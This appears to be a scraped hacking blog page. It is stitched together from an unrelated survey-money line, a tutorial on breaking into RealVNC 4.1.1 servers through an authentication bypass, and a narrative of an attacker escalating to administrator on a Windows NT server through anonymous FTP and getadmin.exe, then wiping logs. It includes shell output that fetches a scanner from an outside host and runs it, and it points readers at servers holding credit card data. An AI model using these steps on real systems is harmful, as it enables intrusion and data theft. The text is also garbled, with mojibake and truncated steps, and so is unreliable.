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Post today I will discuss about how to make money from the internet with AW Surveys.
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Read more: http://pelajaran-blog.blogspot.com/2012/03/cara-membuat-read-more-otomatis-di.html#ixzz1xfYNrBUz
This Basic tutorial will teach you how to hack real VNC server databases.
some servers have mysql database and important information like Credit Card INFORMATION.
so it will depend on what ip range or what server are you scanning and what kind of server is running.
you can hack linux servers, sunos servers, mac os servers,xp servers etc. as long as they are vulnerable to
VNC AUthentication Bypass and using REAL VNC so this software will only bypass the real vnc software its like
Remote desktop in there servers.
The things you need here is:
1. RealVNC <= 4.1.1 Bypass Authentication Scanner
2. VNC Viewer Authentication Bypass
3. Linux uid shell or rootshell
any of these tools will not held me resposible for any damages or action to the servers that
you have hack its your own free will.if you want to download it or not its your choice. or you
can try to find or search tools like this in the net.i just got this tools from some servers too.
im just sharing informations
(RealVNC <= 4.1.1 Bypass Authentication Scanner) for linux shell only
(VNC Viewer Authentication Bypass link) windows base software
(Linux uid shell or rootshell)
Go Find your own shell to use
so after you have gathered the tools you needed LETS START!first login to you shell
then try to scan for vulnerable vnc servers by using the (RealVNC <= 4.1.1 Bypass Authentication Scanner).
after scanning the output of your scan will go to VNC_bypauth.txt. all you need to do is cat VNC_bypauth.txt.
then it will show the vnc servers you have scan if vulnerable or patch or banned so just get the VULNERABLE IPS
then use the ip put it in the (VNC Viewer Authentication Bypass link) server box and just click OK.it will try to
bypass auth the real vnc server if successfull you will be able to get in there desktop or server.
this will be the process command output on the shell.
-sh-3.2$ wget http://upsstoreflorida.com/images/VNCscan
–09:47:54– http://upsstoreflorida.com/images/VNCscan
=> `VNCscan’
æ£å¨æ¥æ¾ä¸»æ© upsstoreflorida.com…
æ£å¨é£æ¥ upsstoreflorida.com||:80… é£ä¸äºã
å·²éåº HTTP è¦æ±ï¼æ£å¨çååæ… 200 OK
é·åº¦: 42,895 (42K) [text/html]
100%[====================================>] 42,895 34.24K/s
09:47:58 (34.16 KB/s) — å·²å
²å âVNCscanâ [42895/42895])
-sh-3.2$ ls -al
ç¸½è¨ 124
drwxr-xr-x 2 sally users 4096 2009-07-08 09:47 .
drwxr-xr-x 6 sally users 4096 2009-06-13 22:41 ..
-rwxr-xr-x 1 sally users 42895 2009-04-25 19:37 v
-rw-r–r– 1 sally users 27730 2009-07-08 10:24 VNC_bypauth.txt
-rwxr-xr-x 1 sally users 42895 2009-05-07 16:05 VNCscan
-sh-3.2$ ./VNCscan 符æ¬éç ä½
-sh-3.2$ chmod +x VNCscan æ
-sh-3.2$ ./VNCscan
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
[-] <scantype>:
[-] <option>:
[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited
-sh-3.2$ ./VNCscan -p 5900 -i -vnc -vv
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
FOUND PORT IP STATUS THREADS TOTAL/REMAINING :5900 vnc4:VULNERABLE :5900 vnc4:banned :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:patched :5900 vnc4:banned
F:0 P:53584 I:53584 S:8 % TH:86 0:00:21/0:03:51
here is the pictures of the
RealVNC <= 4.1.1 Bypass Authentication Scanner
[img src="http://upsstoreflorida.com/images/vncscanner.JPG"]
VNC Viewer Authentication Bypass
[img src="http://upsstoreflorida.com/images/vncauthbypass.JPG"]
HACK SERVER Sample from VNC Viewer Authentication Bypass
[img src="http://upsstoreflorida.com/images/vncserver.JPG"]
Here you go enjoy.
"C:\ftp www.company.com Connected to www.company.com.
220 saturn Microsoft FTP Service (Version 3.0).
User (www.comapny.com:(none)):"
This connection message tells him something extremely important:The NetBIOS name of the server : SATURN. From this he can deduce the name of the anonymous internet account that is used by NT to allow people to anonymously u se the WWW, FTP and Gopher services on the machine. If the default account hasn’t been changed, and he knows that it is very rare if it has been changed, the anonymous internet account will be called IUSR_SATURN. This information will be needed later if he’s to gain Administrator access to the machine. He enters “anonymous”as the user and the following appears:
"331 Anonymous access allowed, send identity (e-mail name)as password. Password:"
Johnny often tries the “guest” account before using “anonymous” as the user. A fresh install of NT has the “guest” account disabled but some admins enable this account...and the funny thing is they usually put a weak password on it such as ‘guest’ or no password at all. If he manages to gain access to the ftp service with this account he has a valid NT user account….everything that the “guest” account has access to…so does Johnny, and sometimes that can be almost everything. He knows he can access their site now…but there is still a long way to go yet….even at this point he still might not get access. At this point he doesn’t even supply a password…he just presses enter and gets a message stating that the Anonymous user is logged in.
150 Opening BINARY mode data connection for CMD.EXE. 226 Transfer complete. 208144 bytes sent in 0.06 seconds(3469.07 Kbytes/sec)"
Next he puts getadmin.exe and gasys.dll into the same directory. With these three files in place he doesn’t even gracefully “close” the ftp session; he just closes the Command Prompt window. With a smile on his face he leans back and lights a smoke, savouring the moment…he knows he has them…. After crunching the cigarette out in an overflowing ashtray he connects to AOL. He does this because if logging is enabled on the NT machine the IP address of AOL’s proxy server will be left and not his own…not that it really matters because soon he’ll edit the logfile and wipe all traces of his presence. Opening up the web browser he enters the following URL:
"CGI Error The specified CGI application misbehaved by not returning a
complete set of HTTP headers."
The headers it did return are:
"Congratulations , now account IUSR_SATURN have administrator rights!"
He has just made the anonymous internet account a local administrator and consequently using this account he can do pretty much what he wants to. Firstly though, he has to create an account for himself that he can use to connect to the NT server using NT Explorer and most of the Administrative tools. He can’t use the IUSR_SATURN account because he doesn’t know the randomly generated password. To create an account he enters the following URL:
thank's to : http://www.binushacker.net/